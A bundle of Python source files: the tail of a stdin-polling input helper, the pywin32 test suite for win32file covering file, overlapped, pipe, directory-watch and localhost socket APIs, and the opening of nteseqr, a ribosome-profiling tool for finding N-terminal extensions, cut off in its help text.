stdin.read(1) print(f"GOT1:{c}") my_input_queue.put(c) print('end of add_input thread') # @log_invokation def input_while(check): import multiprocessing from time import sleep, time # with open(sys.stdin) as f: # f.read() # clear it? # print('clearing stdin') # sys.stdin.read() # clear it? # print('done clearing stdin') addInputErr = AddInputEr( keep_going=True, readsem=multiprocessing.Semaphore() ) input_queue = multiprocessing.Queue() from multiprocessing import Process input_thread = Process(target=addInputErr, args=(input_queue,)) input_thread.daemon = True input_thread.start() last_update = time() result = "" PERIOD = 0.3 # print('start loop with check') recent_input_until = False # first = True while addInputErr.keep_going: if not input_queue.empty(): c = input_queue.get() if c == "\n": addInputErr = keep_going = False # it wont see this? break else: # if first: # log('debug char') # first = False result += c recent_input_until = time() + 1 addInputErr.readsem.release() # it better see this... elif recent_input_until: # purpose: prevent sleeping from making input realllly slow if time() > recent_input_until: recent_input_until = False else: if not check(): # purpose: break out of this function if test fails ("while" condition) addInputErr.keep_going = False # it wont see this? break sleep( PERIOD) # purpose: without this, my computer exploded from high CPU usage (even if we did time.time()-last_update > PERIOD ) # print(f'returning result:{result}') # input_thread._stop() # im desperate input_thread.terminate() # since it might not see "keep_going".... this better work # log('debug out') return result
test_win32file.py
import unittest from pywin32_testutil import str2bytes, TestSkipped, testmain import win32api, win32file, win32pipe, pywintypes, winerror, win32event import win32con, ntsecuritycon import sys import os import tempfile import threading import time import shutil import socket import datetime import random try: import win32timezone except SyntaxError: # win32timezone uses decorators and isn't compatible with py2.3 assert sys.version_info < (2,4) try: set except NameError: from sets import Set as set class TestReadBuffer(unittest.TestCase): def testLen(self): buffer = win32file.AllocateReadBuffer(1) self.failUnlessEqual(len(buffer), 1) def testSimpleIndex(self): val = str2bytes('\xFF') buffer = win32file.AllocateReadBuffer(1) buffer[0] = val self.failUnlessEqual(buffer[0], val) def testSimpleSlice(self): buffer = win32file.AllocateReadBuffer(2) val = str2bytes('\0\0') buffer[:2] = val self.failUnlessEqual(buffer[0:2], val) class TestSimpleOps(unittest.TestCase): def testSimpleFiles(self): try: fd, filename = tempfile.mkstemp() except AttributeError: self.fail("This test requires Python 2.3 or later") os.close(fd) os.unlink(filename) handle = win32file.CreateFile(filename, win32file.GENERIC_WRITE, 0, None, win32con.CREATE_NEW, 0, None) test_data = str2bytes("Hello\0there") try: win32file.WriteFile(handle, test_data) handle.Close() # Try and open for read handle = win32file.CreateFile(filename, win32file.GENERIC_READ, 0, None, win32con.OPEN_EXISTING, 0, None) rc, data = win32file.ReadFile(handle, 1024) self.assertEquals(data, test_data) finally: handle.Close() try: os.unlink(filename) except os.error: pass # A simple test using normal read/write operations. def testMoreFiles(self): # Create a file in the %TEMP% directory. testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" ) desiredAccess = win32file.GENERIC_READ | win32file.GENERIC_WRITE # Set a flag to delete the file automatically when it is closed. fileFlags = win32file.FILE_FLAG_DELETE_ON_CLOSE h = win32file.CreateFile( testName, desiredAccess, win32file.FILE_SHARE_READ, None, win32file.CREATE_ALWAYS, fileFlags, 0) # Write a known number of bytes to the file. data = str2bytes("z") * 1025 win32file.WriteFile(h, data) self.failUnless(win32file.GetFileSize(h) == len(data), "WARNING: Written file does not have the same size as the length of the data in it!") # Ensure we can read the data back. win32file.SetFilePointer(h, 0, win32file.FILE_BEGIN) hr, read_data = win32file.ReadFile(h, len(data)+10) # + 10 to get anything extra self.failUnless(hr==0, "Readfile returned %d" % hr) self.failUnless(read_data == data, "Read data is not what we wrote!") # Now truncate the file at 1/2 its existing size. newSize = len(data)//2 win32file.SetFilePointer(h, newSize, win32file.FILE_BEGIN) win32file.SetEndOfFile(h) self.failUnlessEqual(win32file.GetFileSize(h), newSize) # GetFileAttributesEx/GetFileAttributesExW tests. self.failUnlessEqual(win32file.GetFileAttributesEx(testName), win32file.GetFileAttributesExW(testName)) attr, ct, at, wt, size = win32file.GetFileAttributesEx(testName) self.failUnless(size==newSize, "Expected GetFileAttributesEx to return the same size as GetFileSize()") self.failUnless(attr==win32file.GetFileAttributes(testName), "Expected GetFileAttributesEx to return the same attributes as GetFileAttributes") h = None # Close the file by removing the last reference to the handle! self.failUnless(not os.path.isfile(testName), "After closing the file, it still exists!") def testFilePointer(self): # via [ 979270 ] SetFilePointer fails with negative offset # Create a file in the %TEMP% directory. filename = os.path.join( win32api.GetTempPath(), "win32filetest.dat" ) f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE, 0, None, win32file.CREATE_ALWAYS, win32file.FILE_ATTRIBUTE_NORMAL, 0) try: #Write some data data = str2bytes('Some data') (res, written) = win32file.WriteFile(f, data) self.failIf(res) self.assertEqual(written, len(data)) #Move at the beginning and read the data win32file.SetFilePointer(f, 0, win32file.FILE_BEGIN) (res, s) = win32file.ReadFile(f, len(data)) self.failIf(res) self.assertEqual(s, data) #Move at the end and read the data win32file.SetFilePointer(f, -len(data), win32file.FILE_END) (res, s) = win32file.ReadFile(f, len(data)) self.failIf(res) self.failUnlessEqual(s, data) finally: f.Close() os.unlink(filename) def testFileTimesTimezones(self): if not issubclass(pywintypes.TimeType, datetime.datetime): # maybe should report 'skipped', but that's not quite right as # there is nothing you can do to avoid it being skipped! return filename = tempfile.mktemp("-testFileTimes") now_utc = win32timezone.utcnow() now_local = now_utc.astimezone(win32timezone.TimeZoneInfo.local()) h = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE, 0, None, win32file.CREATE_ALWAYS, 0, 0) try: win32file.SetFileTime(h, now_utc, now_utc, now_utc) ct, at, wt = win32file.GetFileTime(h) self.failUnlessEqual(now_local, ct) self.failUnlessEqual(now_local, at) self.failUnlessEqual(now_local, wt) # and the reverse - set local, check against utc win32file.SetFileTime(h, now_local, now_local, now_local) ct, at, wt = win32file.GetFileTime(h) self.failUnlessEqual(now_utc, ct) self.failUnlessEqual(now_utc, at) self.failUnlessEqual(now_utc, wt) finally: h.close() os.unlink(filename) def testFileTimes(self): if issubclass(pywintypes.TimeType, datetime.datetime): from win32timezone import TimeZoneInfo now = datetime.datetime.now(tz=TimeZoneInfo.local()) nowish = now + datetime.timedelta(seconds=1) later = now + datetime.timedelta(seconds=120) else: rc, tzi = win32api.GetTimeZoneInformation() bias = tzi[0] if rc==2: # daylight-savings is in effect. bias += tzi[-1] bias *= 60 # minutes to seconds... tick = int(time.time()) now = pywintypes.Time(tick+bias) nowish = pywintypes.Time(tick+bias+1) later = pywintypes.Time(tick+bias+120) filename = tempfile.mktemp("-testFileTimes") # Windows docs the 'last time' isn't valid until the last write # handle is closed - so create the file, then re-open it to check. open(filename,"w").close() f = win32file.CreateFile(filename, win32file.GENERIC_READ|win32file.GENERIC_WRITE, 0, None, win32con.OPEN_EXISTING, 0, None) try: ct, at, wt = win32file.GetFileTime(f) self.failUnless(ct >= now, "File was created in the past - now=%s, created=%s" % (now, ct)) self.failUnless( now <= ct <= nowish, (now, ct)) self.failUnless(wt >= now, "File was written-to in the past now=%s, written=%s" % (now,wt)) self.failUnless( now <= wt <= nowish, (now, wt)) # Now set the times. win32file.SetFileTime(f, later, later, later) # Get them back. ct, at, wt = win32file.GetFileTime(f) # XXX - the builtin PyTime type appears to be out by a dst offset. # just ignore that type here... if issubclass(pywintypes.TimeType, datetime.datetime): self.failUnlessEqual(ct, later) self.failUnlessEqual(at, later) self.failUnlessEqual(wt, later) finally: f.Close() os.unlink(filename) class TestOverlapped(unittest.TestCase): def testSimpleOverlapped(self): # Create a file in the %TEMP% directory. import win32event testName = os.path.join( win32api.GetTempPath(), "win32filetest.dat" ) desiredAccess = win32file.GENERIC_WRITE overlapped = pywintypes.OVERLAPPED() evt = win32event.CreateEvent(None, 0, 0, None) overlapped.hEvent = evt # Create the file and write shit-loads of data to it. h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.CREATE_ALWAYS, 0, 0) chunk_data = str2bytes("z") * 0x8000 num_loops = 512 expected_size = num_loops * len(chunk_data) for i in range(num_loops): win32file.WriteFile(h, chunk_data, overlapped) win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE) overlapped.Offset = overlapped.Offset + len(chunk_data) h.Close() # Now read the data back overlapped overlapped = pywintypes.OVERLAPPED() evt = win32event.CreateEvent(None, 0, 0, None) overlapped.hEvent = evt desiredAccess = win32file.GENERIC_READ h = win32file.CreateFile( testName, desiredAccess, 0, None, win32file.OPEN_EXISTING, 0, 0) buffer = win32file.AllocateReadBuffer(0xFFFF) while 1: try: hr, data = win32file.ReadFile(h, buffer, overlapped) win32event.WaitForSingleObject(overlapped.hEvent, win32event.INFINITE) overlapped.Offset = overlapped.Offset + len(data) if not data is buffer: self.fail("Unexpected result from ReadFile - should be the same buffer we passed it") except win32api.error: break h.Close() def testCompletionPortsMultiple(self): # Mainly checking that we can "associate" an existing handle. This # failed in build 203. ioport = win32file.CreateIoCompletionPort(win32file.INVALID_HANDLE_VALUE, 0, 0, 0) socks = [] for PORT in range(9123, 9125): sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) sock.bind(('', PORT)) sock.listen(1) socks.append(sock) new = win32file.CreateIoCompletionPort(sock.fileno(), ioport, PORT, 0) assert new is ioport for s in socks: s.close() hv = int(ioport) ioport = new = None # The handle itself should be closed now (unless we leak references!) # Check that. try: win32file.CloseHandle(hv) raise RuntimeError("Expected close to fail!") except win32file.error as details: self.failUnlessEqual(details.winerror, winerror.ERROR_INVALID_HANDLE) def testCompletionPortsQueued(self): class Foo: pass io_req_port = win32file.CreateIoCompletionPort(-1, None, 0, 0) overlapped = pywintypes.OVERLAPPED() overlapped.object = Foo() win32file.PostQueuedCompletionStatus(io_req_port, 0, 99, overlapped) errCode, bytes, key, overlapped = \ win32file.GetQueuedCompletionStatus(io_req_port, win32event.INFINITE) self.failUnlessEqual(errCode, 0) self.failUnless(isinstance(overlapped.object, Foo)) def _IOCPServerThread(self, handle, port, drop_overlapped_reference): overlapped = pywintypes.OVERLAPPED() win32pipe.ConnectNamedPipe(handle, overlapped) if drop_overlapped_reference: # Be naughty - the overlapped object is now dead, but # GetQueuedCompletionStatus will still find it. Our check of # reference counting should catch that error. overlapped = None # even if we fail, be sure to close the handle; prevents hangs # on Vista 64... try: self.failUnlessRaises(RuntimeError, win32file.GetQueuedCompletionStatus, port, -1) finally: handle.Close() return result = win32file.GetQueuedCompletionStatus(port, -1) ol2 = result[-1] self.failUnless(ol2 is overlapped) data = win32file.ReadFile(handle, 512)[1] win32file.WriteFile(handle, data) def testCompletionPortsNonQueued(self, test_overlapped_death = 0): # In 204 we had a reference count bug when OVERLAPPED objects were # associated with a completion port other than via # PostQueuedCompletionStatus. This test is based on the reproduction # reported with that bug. # Create the pipe. BUFSIZE = 512 pipe_name = r"\\.\pipe\pywin32_test_pipe" handle = win32pipe.CreateNamedPipe(pipe_name, win32pipe.PIPE_ACCESS_DUPLEX| win32file.FILE_FLAG_OVERLAPPED, win32pipe.PIPE_TYPE_MESSAGE| win32pipe.PIPE_READMODE_MESSAGE| win32pipe.PIPE_WAIT, 1, BUFSIZE, BUFSIZE, win32pipe.NMPWAIT_WAIT_FOREVER, None) # Create an IOCP and associate it with the handle. port = win32file.CreateIoCompletionPort(-1, 0, 0, 0) win32file.CreateIoCompletionPort(handle, port, 1, 0) t = threading.Thread(target=self._IOCPServerThread, args=(handle,port, test_overlapped_death)) t.setDaemon(True) # avoid hanging entire test suite on failure. t.start() try: time.sleep(0.1) # let thread do its thing. try: win32pipe.CallNamedPipe(r"\\.\pipe\pywin32_test_pipe", str2bytes("Hello there"), BUFSIZE, 0) except win32pipe.error: # Testing for overlapped death causes this if not test_overlapped_death: raise finally: if not test_overlapped_death: handle.Close() t.join(3) self.failIf(t.isAlive(), "thread didn't finish") def testCompletionPortsNonQueuedBadReference(self): self.testCompletionPortsNonQueued(True) def testHashable(self): overlapped = pywintypes.OVERLAPPED() d = {} d[overlapped] = "hello" self.failUnlessEqual(d[overlapped], "hello") def testComparable(self): overlapped = pywintypes.OVERLAPPED() self.failUnlessEqual(overlapped, overlapped) # ensure we explicitly test the operators. self.failUnless(overlapped == overlapped) self.failIf(overlapped != overlapped) def testComparable2(self): # 2 overlapped objects compare equal if their contents are the same. overlapped1 = pywintypes.OVERLAPPED() overlapped2 = pywintypes.OVERLAPPED() self.failUnlessEqual(overlapped1, overlapped2) # ensure we explicitly test the operators. self.failUnless(overlapped1 == overlapped2) self.failIf(overlapped1 != overlapped2) # now change something in one of them - should no longer be equal. overlapped1.hEvent = 1 self.failIfEqual(overlapped1, overlapped2) # ensure we explicitly test the operators. self.failIf(overlapped1 == overlapped2) self.failUnless(overlapped1 != overlapped2) class TestSocketExtensions(unittest.TestCase): def acceptWorker(self, port, running_event, stopped_event): listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM) listener.bind(('', port)) listener.listen(200) # create accept socket accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # An overlapped overlapped = pywintypes.OVERLAPPED() overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None) # accept the connection. # We used to allow strings etc to be passed here, and they would be # modified! Obviously this is evil :) buffer = " " * 1024 # EVIL - SHOULD NOT BE ALLOWED. self.assertRaises(TypeError, win32file.AcceptEx, listener, accepter, buffer, overlapped) # This is the correct way to allocate the buffer... buffer = win32file.AllocateReadBuffer(1024) rc = win32file.AcceptEx(listener, accepter, buffer, overlapped) self.failUnlessEqual(rc, winerror.ERROR_IO_PENDING) # Set the event to say we are all ready running_event.set() # and wait for the connection. rc = win32event.WaitForSingleObject(overlapped.hEvent, 2000) if rc == win32event.WAIT_TIMEOUT: self.fail("timed out waiting for a connection") nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False) #fam, loc, rem = win32file.GetAcceptExSockaddrs(accepter, buffer) accepter.send(buffer[:nbytes]) # NOT set in a finally - this means *successfully* stopped! stopped_event.set() def testAcceptEx(self): port = 4680 running = threading.Event() stopped = threading.Event() t = threading.Thread(target=self.acceptWorker, args=(port, running,stopped)) t.start() running.wait(2) if not running.isSet(): self.fail("AcceptEx Worker thread failed to start") s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect(('127.0.0.1', port)) win32file.WSASend(s, str2bytes("hello"), None) overlapped = pywintypes.OVERLAPPED() overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None) # Like above - WSARecv used to allow strings as the receive buffer!! buffer = " " * 10 self.assertRaises(TypeError, win32file.WSARecv, s, buffer, overlapped) # This one should work :) buffer = win32file.AllocateReadBuffer(10) win32file.WSARecv(s, buffer, overlapped) nbytes = win32file.GetOverlappedResult(s.fileno(), overlapped, True) got = buffer[:nbytes] self.failUnlessEqual(got, str2bytes("hello")) # thread should have stopped stopped.wait(2) if not stopped.isSet(): self.fail("AcceptEx Worker thread failed to successfully stop") class TestFindFiles(unittest.TestCase): def testIter(self): dir = os.path.join(os.getcwd(), "*") files = win32file.FindFilesW(dir) set1 = set() set1.update(files) set2 = set() for file in win32file.FindFilesIterator(dir): set2.add(file) assert len(set2) > 5, "This directory has less than 5 files!?" self.failUnlessEqual(set1, set2) def testBadDir(self): dir = os.path.join(os.getcwd(), "a dir that doesnt exist", "*") self.assertRaises(win32file.error, win32file.FindFilesIterator, dir) def testEmptySpec(self): spec = os.path.join(os.getcwd(), "*.foo_bar") num = 0 for i in win32file.FindFilesIterator(spec): num += 1 self.failUnlessEqual(0, num) def testEmptyDir(self): test_path = os.path.join(win32api.GetTempPath(), "win32file_test_directory") try: # Note: previously used shutil.rmtree, but when looking for # reference count leaks, that function showed leaks! os.rmdir # doesn't have that problem. os.rmdir(test_path) except os.error: pass os.mkdir(test_path) try: num = 0 for i in win32file.FindFilesIterator(os.path.join(test_path, "*")): num += 1 # Expecting "." and ".." only self.failUnlessEqual(2, num) finally: os.rmdir(test_path) class TestDirectoryChanges(unittest.TestCase): num_test_dirs = 1 def setUp(self): self.watcher_threads = [] self.watcher_thread_changes = [] self.dir_names = [] self.dir_handles = [] for i in range(self.num_test_dirs): td = tempfile.mktemp("-test-directory-changes-%d" % i) os.mkdir(td) self.dir_names.append(td) hdir = win32file.CreateFile(td, ntsecuritycon.FILE_LIST_DIRECTORY, win32con.FILE_SHARE_READ, None, # security desc win32con.OPEN_EXISTING, win32con.FILE_FLAG_BACKUP_SEMANTICS | win32con.FILE_FLAG_OVERLAPPED, None) self.dir_handles.append(hdir) changes = [] t = threading.Thread(target=self._watcherThreadOverlapped, args=(td, hdir, changes)) t.start() self.watcher_threads.append(t) self.watcher_thread_changes.append(changes) def _watcherThread(self, dn, dh, changes): # A synchronous version: # XXX - not used - I was having a whole lot of problems trying to # get this to work. Specifically: # * ReadDirectoryChangesW without an OVERLAPPED blocks infinitely. # * If another thread attempts to close the handle while # ReadDirectoryChangesW is waiting on it, the ::CloseHandle() method # blocks (which has nothing to do with the GIL - it is correctly # managed) # Which ends up with no way to kill the thread! flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME while 1: try: print("waiting", dh) changes = win32file.ReadDirectoryChangesW(dh, 8192, False, #sub-tree flags) print("got", changes) except: raise changes.extend(changes) def _watcherThreadOverlapped(self, dn, dh, changes): flags = win32con.FILE_NOTIFY_CHANGE_FILE_NAME buf = win32file.AllocateReadBuffer(8192) overlapped = pywintypes.OVERLAPPED() overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None) while 1: win32file.ReadDirectoryChangesW(dh, buf, False, #sub-tree flags, overlapped) # Wait for our event, or for 5 seconds. rc = win32event.WaitForSingleObject(overlapped.hEvent, 5000) if rc == win32event.WAIT_OBJECT_0: # got some data! Must use GetOverlappedResult to find out # how much is valid! 0 generally means the handle has # been closed. Blocking is OK here, as the event has # already been set. nbytes = win32file.GetOverlappedResult(dh, overlapped, True) if nbytes: bits = win32file.FILE_NOTIFY_INFORMATION(buf, nbytes) changes.extend(bits) else: # This is "normal" exit - our 'tearDown' closes the # handle. # print "looks like dir handle was closed!" return else: print("ERROR: Watcher thread timed-out!") return # kill the thread! def tearDown(self): # be careful about raising errors at teardown! for h in self.dir_handles: # See comments in _watcherThread above - this appears to # deadlock if a synchronous ReadDirectoryChangesW is waiting... # (No such problems with an asynch ReadDirectoryChangesW) h.Close() for dn in self.dir_names: try: shutil.rmtree(dn) except OSError: print("FAILED to remove directory", dn) for t in self.watcher_threads: # closing dir handle should have killed threads! t.join(5) if t.isAlive(): print("FAILED to wait for thread termination") def stablize(self): time.sleep(0.5) def testSimple(self): self.stablize() for dn in self.dir_names: fn = os.path.join(dn, "test_file") open(fn, "w").close() self.stablize() changes = self.watcher_thread_changes[0] self.failUnlessEqual(changes, [(1, "test_file")]) def testSmall(self): self.stablize() for dn in self.dir_names: fn = os.path.join(dn, "x") open(fn, "w").close() self.stablize() changes = self.watcher_thread_changes[0] self.failUnlessEqual(changes, [(1, "x")]) class TestEncrypt(unittest.TestCase): def testEncrypt(self): fname = tempfile.mktemp("win32file_test") f = open(fname, "wb") f.write(str2bytes("hello")) f.close() f = None try: try: win32file.EncryptFile(fname) except win32file.error as details: if details.winerror != winerror.ERROR_ACCESS_DENIED: raise print("It appears this is not NTFS - cant encrypt/decrypt") win32file.DecryptFile(fname) finally: if f is not None: f.close() os.unlink(fname) class TestConnect(unittest.TestCase): def connect_thread_runner(self, expect_payload, giveup_event): # As Windows 2000 doesn't do ConnectEx, we need to use a non-blocking # accept, as our test connection may never come. May as well use # AcceptEx for this... listener = socket.socket() self.addr = ('localhost', random.randint(10000,64000)) listener.bind(self.addr) listener.listen(1) # create accept socket accepter = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # An overlapped overlapped = pywintypes.OVERLAPPED() overlapped.hEvent = win32event.CreateEvent(None, 0, 0, None) # accept the connection. if expect_payload: buf_size = 1024 else: # when we don't expect data we must be careful to only pass the # exact number of bytes for the endpoint data... buf_size = win32file.CalculateSocketEndPointSize(listener) buffer = win32file.AllocateReadBuffer(buf_size) win32file.AcceptEx(listener, accepter, buffer, overlapped) # wait for the connection or our test to fail. events = giveup_event, overlapped.hEvent rc = win32event.WaitForMultipleObjects(events, False, 2000) if rc == win32event.WAIT_TIMEOUT: self.fail("timed out waiting for a connection") if rc == win32event.WAIT_OBJECT_0: # Our main thread running the test failed and will never connect. return # must be a connection. nbytes = win32file.GetOverlappedResult(listener.fileno(), overlapped, False) if expect_payload: self.request = buffer[:nbytes] accepter.send(str2bytes('some expected response')) def test_connect_with_payload(self): giveup_event = win32event.CreateEvent(None, 0, 0, None) t = threading.Thread(target=self.connect_thread_runner, args=(True, giveup_event)) t.start() time.sleep(0.1) s2 = socket.socket() ol = pywintypes.OVERLAPPED() s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand try: win32file.ConnectEx(s2, self.addr, ol, str2bytes("some expected request")) except win32file.error as exc: win32event.SetEvent(giveup_event) if exc.winerror == 10022: # WSAEINVAL raise TestSkipped("ConnectEx is not available on this platform") raise # some error error we don't expect. win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() buff = win32file.AllocateReadBuffer(1024) win32file.WSARecv(s2, buff, ol, 0) length = win32file.GetOverlappedResult(s2.fileno(), ol, 1) self.response = buff[:length] self.assertEqual(self.response, str2bytes('some expected response')) self.assertEqual(self.request, str2bytes('some expected request')) t.join(5) self.failIf(t.isAlive(), "worker thread didn't terminate") def test_connect_without_payload(self): giveup_event = win32event.CreateEvent(None, 0, 0, None) t = threading.Thread(target=self.connect_thread_runner, args=(False, giveup_event)) t.start() time.sleep(0.1) s2 = socket.socket() ol = pywintypes.OVERLAPPED() s2.bind(('0.0.0.0', 0)) # connectex requires the socket be bound beforehand try: win32file.ConnectEx(s2, self.addr, ol) except win32file.error as exc: win32event.SetEvent(giveup_event) if exc.winerror == 10022: # WSAEINVAL raise TestSkipped("ConnectEx is not available on this platform") raise # some error error we don't expect. win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() buff = win32file.AllocateReadBuffer(1024) win32file.WSARecv(s2, buff, ol, 0) length = win32file.GetOverlappedResult(s2.fileno(), ol, 1) self.response = buff[:length] self.assertEqual(self.response, str2bytes('some expected response')) t.join(5) self.failIf(t.isAlive(), "worker thread didn't terminate") class TestTransmit(unittest.TestCase): def test_transmit(self): import binascii try: bytes = os.urandom(1024*1024) except AttributeError: # must be py2.3... bytes = ''.join([chr(random.randint(0,255)) for _ in range(5)]) val = binascii.hexlify(bytes) val_length = len(val) f = tempfile.TemporaryFile() f.write(val) def runner(): s1 = socket.socket() self.addr = ('localhost', random.randint(10000,64000)) s1.bind(self.addr) s1.listen(1) cli, addr = s1.accept() buf = 1 self.request = [] while buf: buf = cli.recv(1024*100) self.request.append(buf) th = threading.Thread(target=runner) th.start() time.sleep(0.5) s2 = socket.socket() s2.connect(self.addr) length = 0 aaa = str2bytes("[AAA]") bbb = str2bytes("[BBB]") ccc = str2bytes("[CCC]") ddd = str2bytes("[DDD]") empty = str2bytes("") ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, aaa, bbb) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, empty, empty) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, None, ccc) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) ol = pywintypes.OVERLAPPED() f.seek(0) win32file.TransmitFile(s2, win32file._get_osfhandle(f.fileno()), val_length, 0, ol, 0, ddd) length += win32file.GetOverlappedResult(s2.fileno(), ol, 1) s2.close() th.join() buf = str2bytes('').join(self.request) self.assertEqual(length, len(buf)) expected = val + aaa + val + bbb + val + val + ccc + ddd + val self.assertEqual(type(expected), type(buf)) self.assert_(expected == buf) class TestWSAEnumNetworkEvents(unittest.TestCase): def test_basics(self): s = socket.socket() e = win32event.CreateEvent(None, 1, 0, None) win32file.WSAEventSelect(s, e, 0) self.assertEquals(win32file.WSAEnumNetworkEvents(s), {}) self.assertEquals(win32file.WSAEnumNetworkEvents(s, e), {}) self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, e, 3) self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, s, "spam") self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam", e) self.assertRaises(TypeError, win32file.WSAEnumNetworkEvents, "spam") f = open("NUL") h = win32file._get_osfhandle(f.fileno()) self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, h) self.assertRaises(win32file.error, win32file.WSAEnumNetworkEvents, s, h) try: win32file.WSAEnumNetworkEvents(h) except win32file.error as e: self.assertEquals(e.winerror, win32file.WSAENOTSOCK) try: win32file.WSAEnumNetworkEvents(s, h) except win32file.error as e: # According to the docs it would seem reasonable that # this would fail with WSAEINVAL, but it doesn't. self.assertEquals(e.winerror, win32file.WSAENOTSOCK) def test_functional(self): # This is not really a unit test, but it does exercise the code # quite well and can serve as an example of WSAEventSelect and # WSAEnumNetworkEvents usage. port = socket.socket() port.setblocking(0) port_event = win32event.CreateEvent(None, 0, 0, None) win32file.WSAEventSelect(port, port_event, win32file.FD_ACCEPT | win32file.FD_CLOSE) port.bind(("127.0.0.1", 0)) port.listen(10) client = socket.socket() client.setblocking(0) client_event = win32event.CreateEvent(None, 0, 0, None) win32file.WSAEventSelect(client, client_event, win32file.FD_CONNECT | win32file.FD_READ | win32file.FD_WRITE | win32file.FD_CLOSE) err = client.connect_ex(port.getsockname()) self.assertEquals(err, win32file.WSAEWOULDBLOCK) res = win32event.WaitForSingleObject(port_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(port, port_event) self.assertEquals(events, {win32file.FD_ACCEPT: 0}) server, addr = port.accept() server.setblocking(0) server_event = win32event.CreateEvent(None, 1, 0, None) win32file.WSAEventSelect(server, server_event, win32file.FD_READ | win32file.FD_WRITE | win32file.FD_CLOSE) res = win32event.WaitForSingleObject(server_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(server, server_event) self.assertEquals(events, {win32file.FD_WRITE: 0}) res = win32event.WaitForSingleObject(client_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(client, client_event) self.assertEquals(events, {win32file.FD_CONNECT: 0, win32file.FD_WRITE: 0}) sent = 0 data = str2bytes("x") * 16 * 1024 while sent < 16 * 1024 * 1024: try: sent += client.send(data) except socket.error as e: if e.args[0] == win32file.WSAEINTR: continue elif e.args[0] in (win32file.WSAEWOULDBLOCK, win32file.WSAENOBUFS): break else: raise else: self.fail("could not find socket buffer limit") events = win32file.WSAEnumNetworkEvents(client) self.assertEquals(events, {}) res = win32event.WaitForSingleObject(server_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(server, server_event) self.assertEquals(events, {win32file.FD_READ: 0}) received = 0 while received < sent: try: received += len(server.recv(16 * 1024)) except socket.error as e: if e.args[0] in [win32file.WSAEINTR, win32file.WSAEWOULDBLOCK]: continue else: raise self.assertEquals(received, sent) events = win32file.WSAEnumNetworkEvents(server) self.assertEquals(events, {}) res = win32event.WaitForSingleObject(client_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(client, client_event) self.assertEquals(events, {win32file.FD_WRITE: 0}) client.shutdown(socket.SHUT_WR) res = win32event.WaitForSingleObject(server_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) # strange timing issues... for i in range(5): events = win32file.WSAEnumNetworkEvents(server, server_event) if events: break win32api.Sleep(100) else: raise AssertionError("failed to get events") self.assertEquals(events, {win32file.FD_CLOSE: 0}) events = win32file.WSAEnumNetworkEvents(client) self.assertEquals(events, {}) server.close() res = win32event.WaitForSingleObject(client_event, 1000) self.assertEquals(res, win32event.WAIT_OBJECT_0) events = win32file.WSAEnumNetworkEvents(client, client_event) self.assertEquals(events, {win32file.FD_CLOSE: 0}) client.close() events = win32file.WSAEnumNetworkEvents(port) self.assertEquals(events, {}) if __name__ == '__main__': testmain()
nteseqr.py
# -*- coding: utf-8 -*- """ Created on Thu Aug 16 16:39:54 2018 nteseqr Description: Takes ribosome profiling data and annotated reference genomes to identify N-terminal extensions (NTE) @author: Pieter Spealman 12.3.2019 (Concentrate Feed) Implementing improvements for MiMB publication _x_ nteseqr, identify high likelihood NTEs and filter them from uORFseqr 04.28.2021 (Oral Solve) _x_ Removed atis_uid hash """ # #import multiprocessing import re import numpy as np import pickle import scipy.stats as stats import argparse import subprocess import os def output_handler(output): if len(output.strip()) > 1: print(output) #function handles help commands def help_dialog(): monolog=('Manual for nteseqr\n'+ '#=============================================================#\n'+ 'Lead programmer: Pieter Spealman pspsealman@nyu.edu\n'+ 'Release version: 1.0 \n'+ 'Release date: 12.31.19 \n'+ 'Description:\n\t nteseqr identifies N-terminal extensions using ribosome \n'+ '\t profiling and RNAseq data.\n'+ '\t\t Briefly, NTE-seqr attempts to identify N-terminal extensions by first \n'+ '\t finding all regions upstream of main ORF start codons and the nearest \n'+ '\t in-frame upstream stop codon. These search regions are then scanned to \n'+ '\t identify genes with large numbers of in-frame ribosomes. Search regions \n'+ 